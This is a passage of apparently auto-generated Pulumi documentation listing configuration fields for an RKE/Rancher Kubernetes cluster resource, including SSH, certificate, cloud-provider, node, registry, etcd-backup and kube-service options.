* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **certificates** object supports the following:
* `certificate` (`pulumi.Input[str]`)
* `commonName` (`pulumi.Input[str]`)
* `config` (`pulumi.Input[str]`)
* `configEnvName` (`pulumi.Input[str]`)
* `configPath` (`pulumi.Input[str]`)
* `envName` (`pulumi.Input[str]`)
* `id` (`pulumi.Input[str]`) - (Computed) The ID of the resource (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `keyEnvName` (`pulumi.Input[str]`)
* `keyPath` (`pulumi.Input[str]`)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `ouName` (`pulumi.Input[str]`)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
The **cloud_provider** object supports the following:
* `awsCloudConfig` (`pulumi.Input[dict]`) - Use aws_cloud_provider instead
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
              * `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead of creating new ones (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
              * `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interacting with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `awsCloudProvider` (`pulumi.Input[dict]`) - AWS Cloud Provider config [rke-aws-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/aws/) (list maxitems:1)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
              * `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead of creating new ones (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
              * `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interacting with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `azureCloudConfig` (`pulumi.Input[dict]`) - Use azure_cloud_provider instead
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `azureCloudProvider` (`pulumi.Input[dict]`) - Azure Cloud Provider config [rke-azure-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/azure/) (list maxitems:1)
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `customCloudConfig` (`pulumi.Input[str]`) - Use custom_cloud_provider instead
* `customCloudProvider` (`pulumi.Input[str]`) - Custom Cloud Provider config (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `openstackCloudConfig` (`pulumi.Input[dict]`) - Use openstack_cloud_provider instead
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `openstackCloudProvider` (`pulumi.Input[dict]`) - Openstack Cloud Provider config [rke-openstack-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/openstack/) (list maxitems:1)
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `vsphereCloudConfig` (`pulumi.Input[dict]`) - Use vsphere_cloud_provider instead
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
* `vsphereCloudProvider` (`pulumi.Input[dict]`) - Vsphere Cloud Provider config [rke-vsphere-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/vsphere/) Extra argument `name` is required on `virtual_center` configuration. (list maxitems:1)
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
The **control_plane_hosts** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
The **dns** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
* `reverseCidrs` (`pulumi.Input[list]`) - Reverse CIDRs (list)
* `upstreamNameservers` (`pulumi.Input[list]`) - Upstream nameservers (list)
The **etcd_hosts** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
The **inactive_hosts** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
The **ingress** object supports the following:
* `dnsPolicy` (`pulumi.Input[str]`) - Ingress controller DNS policy. `ClusterFirstWithHostNet`, `ClusterFirst`, `Default`, and `None` are supported. [K8S dns Policy](https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-policy) (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **monitoring** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **network** object supports the following:
* `calicoNetworkProvider` (`pulumi.Input[dict]`) - Calico network provider config (list maxitems:1)
* `cloud_provider` (`pulumi.Input[str]`) - Calico cloud provider (string)
* `canalNetworkProvider` (`pulumi.Input[dict]`) - Canal network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
* `flannelNetworkProvider` (`pulumi.Input[dict]`) - Flannel network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
* `mtu` (`pulumi.Input[float]`) - Network provider MTU. Default `0` (int)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `plugin` (`pulumi.Input[str]`) - Network provider plugin. `calico`, `canal` (default), `flannel`, `none` and `weave` are supported. (string)
* `weaveNetworkProvider` (`pulumi.Input[dict]`) - Weave network provider config (list maxitems:1)
* `password` (`pulumi.Input[str]`) - Registry password (string)
The **nodes** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `dockerSocket` (`pulumi.Input[str]`) - Docker socket on the node that will be used in tunneling (string)
* `hostnameOverride` (`pulumi.Input[str]`) - Hostname override for node (string)
* `internalAddress` (`pulumi.Input[str]`) - Internal address that will be used for components communication (string)
* `labels` (`pulumi.Input[dict]`) - Node labels (map)
* `nodeName` (`pulumi.Input[str]`) - Name of the host provisioned via docker machine (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `roles` (`pulumi.Input[list]`) - Node roles in k8s cluster. `controlplane`, `etcd` and `worker` are supported. (list)
* `rolesDeprecated` (`pulumi.Input[str]`)
* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `taints` (`pulumi.Input[list]`) - Node taints (list)
* `effect` (`pulumi.Input[str]`) - Taint effect. `NoExecute`, `NoSchedule` (default) and `PreferNoSchedule` are supported (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `value` (`pulumi.Input[str]`) - Taint value (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **private_registries** object supports the following:
* `isDefault` (`pulumi.Input[bool]`) - Set as default registry. Default `false` (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **restore** object supports the following:
* `restore` (`pulumi.Input[bool]`) - Restore cluster. Default `false` (bool)
* `snapshotName` (`pulumi.Input[str]`) - Snapshot name (string)
The **rotate_certificates** object supports the following:
* `caCertificates` (`pulumi.Input[bool]`) - Rotate CA Certificates. Default `false` (bool)
* `services` (`pulumi.Input[list]`) - Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
The **running_system_images** object supports the following:
* `alpine` (`pulumi.Input[str]`) - Docker image for alpine (string)
* `calicoCni` (`pulumi.Input[str]`) - Docker image for calico_cni (string)
* `calicoControllers` (`pulumi.Input[str]`) - Docker image for calico_controllers (string)
* `calicoCtl` (`pulumi.Input[str]`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`pulumi.Input[str]`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`pulumi.Input[str]`) - Docker image for calico_node (string)
* `canalCni` (`pulumi.Input[str]`) - Docker image for canal_cni (string)
* `canalFlannel` (`pulumi.Input[str]`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`pulumi.Input[str]`) - Docker image for canal_flex_vol (string)
* `canalNode` (`pulumi.Input[str]`) - Docker image for canal_node (string)
* `certDownloader` (`pulumi.Input[str]`) - Docker image for cert_downloader (string)
* `coredns` (`pulumi.Input[str]`) - Docker image for coredns (string)
* `corednsAutoscaler` (`pulumi.Input[str]`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`pulumi.Input[str]`) - Docker image for dnsmasq (string)
* `etcd` (`pulumi.Input[str]`) - Docker image for etcd (string)
* `flannel` (`pulumi.Input[str]`) - Docker image for flannel (string)
* `flannelCni` (`pulumi.Input[str]`) - Docker image for flannel_cni (string)
* `ingress` (`pulumi.Input[str]`) - Docker image for ingress (string)
* `ingressBackend` (`pulumi.Input[str]`) - Docker image for ingress_backend (string)
* `kubeDns` (`pulumi.Input[str]`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`pulumi.Input[str]`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`pulumi.Input[str]`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`pulumi.Input[str]`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`pulumi.Input[str]`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`pulumi.Input[str]`) - Docker image for metrics_server (string)
* `nginxProxy` (`pulumi.Input[str]`) - Docker image for nginx_proxy (string)
* `nodelocal` (`pulumi.Input[str]`) - Docker image for nodelocal (string)
* `podInfraContainer` (`pulumi.Input[str]`) - Docker image for pod_infra_container (string)
* `weaveCni` (`pulumi.Input[str]`) - Docker image for weave_cni (string)
* `weaveNode` (`pulumi.Input[str]`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`pulumi.Input[str]`) - Docker image for windows_pod_infra_container (string)
The **services** object supports the following:
* `etcd` (`pulumi.Input[dict]`) - Docker image for etcd (string)
* `backupConfig` (`pulumi.Input[dict]`) - Backup options for etcd service. Just for Rancher v2.2.x (list maxitems:1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `intervalHours` (`pulumi.Input[float]`) - Interval hours for etcd backup. Default `12` (int)
* `retention` (`pulumi.Input[float]`) - Retention for etcd backup. Default `6` (int)
* `s3BackupConfig` (`pulumi.Input[dict]`) - S3 config options for etcd backup (list maxitems:1)
* `accessKey` (`pulumi.Input[str]`) - Access key for S3 service (string)
* `bucketName` (`pulumi.Input[str]`) - Bucket name for S3 service (string)
* `customCa` (`pulumi.Input[str]`) - Base64 encoded custom CA for S3 service. Use filebase64(<FILE>) for encoding file. Available from Rancher v2.2.5 (string)
* `endpoint` (`pulumi.Input[str]`) - Endpoint for S3 service (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `secretKey` (`pulumi.Input[str]`) - Secret key for S3 service (string)
* `safeTimestamp` (`pulumi.Input[bool]`) - Safe timestamp for etcd backup. Default: `false` (bool)
* `caCert` (`pulumi.Input[str]`) - TLS CA certificate for etcd service (string)
* `cert` (`pulumi.Input[str]`) - TLS certificate for etcd service (string)
* `creation` (`pulumi.Input[str]`) - Creation option for etcd service (string)
* `externalUrls` (`pulumi.Input[list]`) - External urls for etcd service (list)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `gid` (`pulumi.Input[float]`) - Etcd service GID. Default: `0`. For Rancher v2.3.x or above (int)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `retention` (`pulumi.Input[str]`) - Retention for etcd backup. Default `6` (int)
* `snapshot` (`pulumi.Input[bool]`) - Snapshot option for etcd service. Default `true` (bool)
* `uid` (`pulumi.Input[float]`) - Etcd service UID. Default: `0`. For Rancher v2.3.x or above (int)
* `kubeApi` (`pulumi.Input[dict]`) - Kube API options for RKE services (list maxitems:1)
* `alwaysPullImages` (`pulumi.Input[bool]`) - Enable [AlwaysPullImages](https://kubernetes.io/docs/reference/access-authn-authz/admission-controllers/#alwayspullimages) Admission controller plugin. [Rancher docs](https://rancher.com/docs/rke/latest/en/config-options/services/#kubernetes-api-server-options) Default: `false` (bool)
* `auditLog` (`pulumi.Input[dict]`) - K8s audit log configuration. (list maxitem: 1)
* `configuration` (`pulumi.Input[dict]`) - Audit log configuration. (list maxitem: 1)
* `format` (`pulumi.Input[str]`) - Audit log format. Default: `json` (string)
* `maxAge` (`pulumi.Input[float]`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`pulumi.Input[float]`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`pulumi.Input[float]`) - Audit log max size. Default: `100` (int)
* `path` (`pulumi.Input[str]`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`pulumi.Input[str]`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`pulumi.Input[dict]`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`pulumi.Input[bool]`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`pulumi.Input[dict]`) - [Encrypt k8s secret data configuration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`pulumi.Input[bool]`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`pulumi.Input[str]`) - Service Node Port Range option for kube API service (string)
* `kubeController` (`pulumi.Input[dict]`) - Kube Controller options for RKE services (list maxitems:1)
* `cluster_cidr` (`pulumi.Input[str]`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `image` (`pulumi.Input[str]`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`pulumi.Input[str]`) - Service Cluster ip Range option for kube controller service (string)
* `kubelet` (`pulumi.Input[dict]`) - Kubelet options for RKE services (list maxitems:1)
* `cluster_dns_server` (`pulumi.Input[str]`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`pulumi.Input[str]`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `extraBinds` (`pulumi.Input[list]`) - Extra binds for scheduler service (list)
* `extraEnvs` (`pulumi.Input[list]`) - Extra environment for scheduler service (list)
* `failSwapOn` (`pulumi.Input[bool]`) - Enable or disable failing when swap on is not supported (bool)
